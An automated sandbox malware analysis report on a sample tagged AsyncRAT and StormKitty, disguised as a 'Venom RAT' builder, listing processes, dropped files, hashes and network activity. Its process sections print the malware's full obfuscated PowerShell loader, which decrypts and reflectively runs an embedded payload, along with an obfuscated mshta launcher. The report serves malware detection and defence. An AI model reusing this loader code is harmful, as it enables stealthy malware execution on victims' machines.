Malware Analysis Report

2024-09-23 03:10

Sample ID 240323-ba892sbc56
Target 35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5
SHA256 35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5
Tags
rat default asyncrat stormkitty
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5

Threat Level: Known bad

The file 35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5 was found to be: Known bad.

Malicious Activity Summary

rat default asyncrat stormkitty

Asyncrat family

StormKitty payload

Async RAT payload

Stormkitty family

AsyncRat

Executes dropped EXE

Checks computer location settings

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-03-23 00:58

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Asyncrat family

asyncrat

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-23 00:57

Reported

2024-04-15 16:08

Platform

win10-20240404-en

Max time kernel

21s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"

Signatures

AsyncRat

rat asyncrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe N/A
N/A N/A C:\Windows\$sxr-mshta.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\$sxr-mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe

"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

"C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fcYQxVhvEiaGdINTAJQc4312:JJRWgfrr=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-fcYQxVhvEiaGdINTAJQc4312:JJRWgfrr=%

Network

Country Destination Domain Proto
US 8.8.8.8:53 25.251.17.2.in-addr.arpa udp

Files

memory/4660-0-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4660-1-0x0000000000630000-0x000000000205A000-memory.dmp

memory/4660-2-0x000000001CBF0000-0x000000001CC00000-memory.dmp

C:\Users\Admin\AppData\Roaming\Venom.bat

MD5 04fd97b8a5d2132eee84f856ee0fa938
SHA1 0d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
SHA256 bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
SHA512 e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

MD5 3b3a304c6fc7a3a1d9390d7cbff56634
SHA1 e8bd5244e6362968f5017680da33f1e90ae63dd7
SHA256 7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
SHA512 7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Venom RAT + HVNC + Stealer + Grabber.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

memory/884-15-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4660-14-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/884-16-0x0000012A58AF0000-0x0000012A59924000-memory.dmp

memory/4592-23-0x000002031B460000-0x000002031B470000-memory.dmp

memory/4592-22-0x000002031B460000-0x000002031B470000-memory.dmp

memory/4592-21-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4592-24-0x000002031B610000-0x000002031B632000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xefsshr.jwv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4592-53-0x000002031B7B0000-0x000002031B7EC000-memory.dmp

memory/4592-64-0x000002031BC20000-0x000002031BC96000-memory.dmp

memory/4592-73-0x000002031B460000-0x000002031B470000-memory.dmp

memory/4592-74-0x0000020364210000-0x0000020364AA8000-memory.dmp

memory/4592-79-0x00007FFF22F60000-0x00007FFF2300E000-memory.dmp

memory/4592-80-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

memory/4592-81-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

memory/4592-83-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

memory/884-82-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4592-84-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4592-85-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

memory/4592-86-0x000002031BCA0000-0x000002031C76A000-memory.dmp

memory/4592-87-0x000002031B850000-0x000002031B8EA000-memory.dmp

memory/4592-102-0x000002031C770000-0x000002031C7C2000-memory.dmp

memory/4592-103-0x000002031C7C0000-0x000002031C818000-memory.dmp

memory/4592-104-0x000002031B780000-0x000002031B7AE000-memory.dmp

memory/4592-119-0x000002031B460000-0x000002031B470000-memory.dmp

memory/4592-247-0x000002031B2C0000-0x000002031B2C8000-memory.dmp

memory/4592-251-0x0000000180000000-0x0000000180009000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 98447a7f26ee9dac6b806924d6e21c90
SHA1 a67909346a56289b7087821437efcaa51da3b083
SHA256 c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512 c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

memory/4592-359-0x000002031B460000-0x000002031B470000-memory.dmp

C:\Windows\$sxr-cmd.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-23 00:57

Reported

2024-04-15 16:08

Platform

win10v2004-20240412-en

Max time kernel

58s

Max time network

66s

Command Line

"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"

Signatures

AsyncRat

rat asyncrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe

"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

"C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp

Files

memory/4956-0-0x00007FFEB5040000-0x00007FFEB5B01000-memory.dmp

memory/4956-1-0x0000000000780000-0x00000000021AA000-memory.dmp

memory/4956-2-0x000000001CF10000-0x000000001CF20000-memory.dmp

C:\Users\Admin\AppData\Roaming\Venom.bat

MD5 04fd97b8a5d2132eee84f856ee0fa938
SHA1 0d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
SHA256 bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
SHA512 e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

MD5 3b3a304c6fc7a3a1d9390d7cbff56634
SHA1 e8bd5244e6362968f5017680da33f1e90ae63dd7
SHA256 7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
SHA512 7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

memory/4956-20-0x00007FFEB5040000-0x00007FFEB5B01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Venom RAT + HVNC + Stealer + Grabber.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/1784-21-0x00007FFEB5040000-0x00007FFEB5B01000-memory.dmp

memory/1784-22-0x000002242B240000-0x000002242C074000-memory.dmp

memory/1784-23-0x00007FFEB5040000-0x00007FFEB5B01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tpcs2kwo.ga1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5052-34-0x000001DBBBFF0000-0x000001DBBC012000-memory.dmp

memory/5052-29-0x00007FFEB50F0000-0x00007FFEB5BB1000-memory.dmp

memory/5052-36-0x000001DBB9E40000-0x000001DBB9E50000-memory.dmp

memory/5052-35-0x000001DBB9E40000-0x000001DBB9E50000-memory.dmp

memory/5052-37-0x000001DBBC3D0000-0x000001DBBC414000-memory.dmp

memory/5052-38-0x000001DBBC4A0000-0x000001DBBC516000-memory.dmp

memory/5052-39-0x000001DBF4780000-0x000001DBF5018000-memory.dmp

memory/5052-40-0x00007FFED3A40000-0x00007FFED3AFE000-memory.dmp

memory/5052-41-0x00007FFED4090000-0x00007FFED4285000-memory.dmp

memory/5052-42-0x00007FFED4090000-0x00007FFED4285000-memory.dmp

memory/5052-43-0x00007FFED4090000-0x00007FFED4285000-memory.dmp

memory/5052-44-0x00007FFEB50F0000-0x00007FFEB5BB1000-memory.dmp

memory/5052-45-0x00007FFED4090000-0x00007FFED4285000-memory.dmp